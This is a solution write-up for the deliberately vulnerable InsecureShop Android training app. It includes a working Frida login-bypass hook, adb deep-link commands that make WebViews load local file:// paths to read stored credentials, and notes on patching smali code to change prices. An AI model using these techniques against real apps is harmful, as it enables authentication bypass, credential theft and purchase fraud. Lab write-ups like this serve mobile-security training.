Insecure Shop Application

Table of Content

  1. Starting the Solution

  2. Hardcoded Credentials

  3. Hooking The Login page

  4. Insecure Logging

  5. Deep Link Exploitation using WebView

  6. Deep Link Exploitation using WebView2Activity

  7. Editing on Smali Code

1- Starting the Solution

First start to use the application and found logging and try to test the creds and how it's react and try some SQL payloads and still the same "Invalid username and password"

So i try to reverse the code using Jadx-gui to search for username and saw Boolean Function called "verifyUserNamePassword()" and this is the function that verify the username and the password.

2- Hardcoded Credentials

When opening it I found a getUserCreds() function that have the Hardcoded creds of the login page.

3- Hooking The Login page

Now i can login but if i can't found Hardcoded creds there is also another way to bypass the login by using Frida Script by using the Package name(com.insecureshop.util) , Class name(Util), and the required function name (verifyUserNamePassword()) that appear in the Util File.

and this is the Script That we can use Java.perform(function () { console.log("[*] Hooking InsecureShop Login Bypass");

Java.perform(function () {
    var LoginBypass = Java.use("com.insecureshop.util.Util");
    LoginBypass.verifyUserNamePassword.implementation = function (username, password) {
        return true; 
    };

    console.log("[*] Login Bypass Hook Injected Successfully.");
});

and save it like file.js file then run the Frida sever on the emulator and run this command to Hook on the function. frida -U -l file.js -f <Package_Name> and i can login without Creds in the login page.

4- Insecure Logging

Using Logcat command in the to see if the app logged the data and it logged it in local file system

And see it in the file using cat /data/data/com.insecureshop/shared_prefs/Prefs.xml and found the Creds here.

5- Deep Link Exploitation using WebView

I found WebViewActivityhere with the host com.insecureshop and scheme insecureshop with and it open it when try to access /web OR /webview and the parameter url so the final link will be something like this: insecureshop://com.insecureshop/web?url=<URL_Link>

So i can use ADB Activity Manager so use it like this to open google website adb shell am start -n com.insecureshop/.WebViewActivity -d "insecureshop://com.insecureshop/web?url=http://google.com"

and it worked and open google in the WebView of the application

and also i can access file data using the file:// schema like this adb shell am start -n com.insecureshop/.WebViewActivity -d "insecureshop://com.insecureshop/web?url=file:///data/data/com.insecureshop/shared_prefs/Prefs.xml"

6- Deep Link Exploitation using WebView2Activity

I found WebView2Activityhere with the same as the previous one but without host and scheme, so i can open any file and any link without specific schema and host:

am start -n com.insecureshop/.WebView2Activity -d "file:///data/data/com.insecureshop/shared_prefs/Prefs.xml"

file:///data/data/com.insecureshop/shared_prefs/Prefs.xml
or 
https://google.com

7- Editing on Smali Code

I open the file.apk file in APKLab Extension in Visual Studio Code and edit the prices that stored in the Smali Code and then rebuild the app again and i able to buy all items with another prices.

PreviousDIVA

Last updated

Was this helpful?